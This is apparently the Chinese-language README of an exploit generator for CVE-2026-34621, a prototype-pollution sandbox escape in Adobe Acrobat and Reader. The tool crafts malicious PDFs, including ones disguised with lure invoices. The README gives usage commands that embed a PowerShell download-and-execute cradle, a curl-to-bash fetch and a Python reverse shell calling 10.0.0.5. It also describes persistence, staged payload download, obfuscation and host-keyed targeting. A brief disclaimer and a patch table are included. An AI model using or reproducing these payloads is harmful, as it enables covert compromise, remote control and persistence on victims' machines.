
一个复杂且跨平台的漏洞利用生成器,针对 **CVE-2026-34621** —— 这是 Adobe Acrobat 和 Reader 中的一个严重原型污染漏洞,可导致在 Windows 和 macOS 上实现沙箱逃逸及任意代码执行。
一个针对 CVE-2026-34621 的复杂跨平台漏洞利用生成器——这是 Adobe Acrobat 和 Reader 中的一个严重原型污染漏洞,可导致 Windows 和 macOS 上的沙箱逃逸及任意代码执行。
⚠️ 重要免责声明
本工具仅用于授权的安全研究和渗透测试。
未经授权对您不拥有或未获得明确书面许可的系统进行使用是非法的。作者对滥用行为不承担任何责任。
CVE-2026-34621 是 Adobe Acrobat 和 Reader 中的一个零日漏洞,允许攻击者:
该生成器会创建一个恶意 PDF 文件,当在受影响版本的 Adobe Reader 中打开时,会自动执行针对受害者操作系统定制的载荷。
支持的目标平台:
| 类别 | 能力 |
|---|---|
| 跨平台载荷 | 自动检测操作系统并选择相应的 Windows 或 macOS 命令执行方式。 |
| 多种执行向量 | cmd.exe、PowerShell、WScript.Shell(Windows)/ Terminal.app、osascript(macOS)。 |
| 分阶段载荷 | 从远程 URL 下载并执行第二阶段载荷。 |
| 持久化 | 安装注册表 Run 键(Windows)或 LaunchAgent(macOS)。 |
| 规避技术 | 三级 JavaScript 混淆、环境密钥绑定、执行延迟、多态代码。 |
| 诱饵 PDF 嵌入 | 将漏洞利用合并到看似合法的 PDF 中(需要 PyPDF2)。 |
| 多种触发方式 | OpenAction、页面打开动作或文档级 JavaScript。 |
| 全面报告 | 生成 HTML、TXT 和 JSON 报告,详细说明载荷配置。 |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
核心脚本仅使用 Python 标准库。如需诱饵 PDF 合并功能,请安装 PyPDF2:
pip install PyPDF2
生成一个在 Windows 和 macOS 上均能打开计算器的基本 PDF:
python3 cve_2026_34621_advanced.py -o test.pdf
这将生成:
test.pdf – 恶意 PDF 文件。
test_report.html – 详细 HTML 报告。
test_report.txt – 纯文本摘要。
test_config.json – JSON 配置导出。
Windows 命令
1-场景 命令
A-基本 calc.exe 弹窗
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
PowerShell 反向 Shell
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
带持久化的分阶段载荷
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
环境密钥绑定(仅在 "SALES-PC" 上运行)
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
混淆级别 2 并延迟 10 秒
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
macOS 命令
2-场景 命令
打开计算器
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
下载并执行脚本
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
通过 Python 实现反向 Shell
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
通过 LaunchAgent 实现持久化
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
嵌入诱饵 PDF
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-移动端测试说明
脚本本身在桌面端(Windows/macOS/Linux)运行以生成 PDF。生成的 PDF 可以在 Android 或 iOS 设备上打开,但:
移动版 Adobe Acrobat Reader 不受 CVE-2026-34621 影响。
载荷将触发良性的演示回退(打开 URL 或显示提示),而不是执行系统命令。
选项 描述
-o、--output FILE 必需。输出 PDF 文件名。
--win CMD 要执行的 Windows 命令(默认:calc.exe)。
--mac CMD 要执行的 macOS 命令(默认:open /System/Applications/Calculator.app)。
--stage URL 用于下载第二阶段载荷的 URL。
-p、--persistence 安装持久化机制(注册表/LaunchAgent)。
-O、--obfuscate LEVEL JavaScript 混淆级别(0=无,1=基础,2=中级,3=高级)。
-d、--delay SECONDS 延迟指定秒数后执行。
-k、--key HOSTNAME 环境密钥绑定——仅在匹配的主机名上执行。
-l、--lure PDF 用作诱饵的合法 PDF 路径(合并漏洞利用)。
--trigger TYPE 触发向量:openaction、pageopen 或 doclevel。
--no-reports 跳过生成 HTML/TXT/JSON 报告。
--seed N 设置随机种子以实现可复现的多态生成。
攻击链
原型污染:
嵌入的 JavaScript 修改 Object.prototype 以注入恶意属性(__trusted、privileged 等)。这会混淆 Adobe JavaScript 引擎的信任边界。
上下文提升
由于原型被污染,引擎错误地将不受信任的文档 JavaScript 视为在特权上下文中运行。
特权 API 访问
脚本现在可以调用受限 API,如 app.launchURL、util.readFileIntoStream 和 app.trustedFunction。
沙箱逃逸
这些 API 允许在 Adobe 沙箱之外进行文件系统访问和进程执行。
任意代码执行
脚本使用操作系统特定的方法执行攻击者的命令:
Windows:cmd.exe /c、PowerShell 或 WScript.Shell。
macOS:Terminal.app URL 处理器或 osascript。
混淆级别
级别 描述
0 无混淆——纯可读 JavaScript。
1 字符串字面量转换为 String.fromCharCode,变量名随机化。
2 级别 1 + 死代码注入和垃圾注释。
3 整个脚本进行 base64 编码并包装在 eval(atob(...)) 中,然后再次混淆。
产品 轨道 受影响版本 已修补版本
Adobe Acrobat DC 持续 ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC 持续 ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 经典 ≤ 24.001.30356 24.001.30362(Windows)/ 24.001.30360(macOS)
立即更新:应用 Adobe 的最新安全更新。
在 Adobe Reader 中禁用 JavaScript:编辑 → 首选项 → JavaScript → 取消勾选"启用 Acrobat JavaScript"(注意:这会破坏某些 PDF 功能)。
使用替代 PDF 查看器:考虑使用不受影响的浏览器或第三方查看器。
欢迎贡献,但请注意:
所有拉取请求必须用于防御性研究、检测改进或报告增强。
我们不接受超出合法测试所需范围、增加工具攻击能力的贡献。
贡献方式:
Fork 仓库。
创建功能分支。
提交带有清晰变更描述的拉取请求。
本项目仅用于教育和授权安全测试目的。
使用本软件即表示您同意自行负责遵守所有适用的法律法规。
作者对因使用本工具造成的任何滥用或损害不承担任何责任。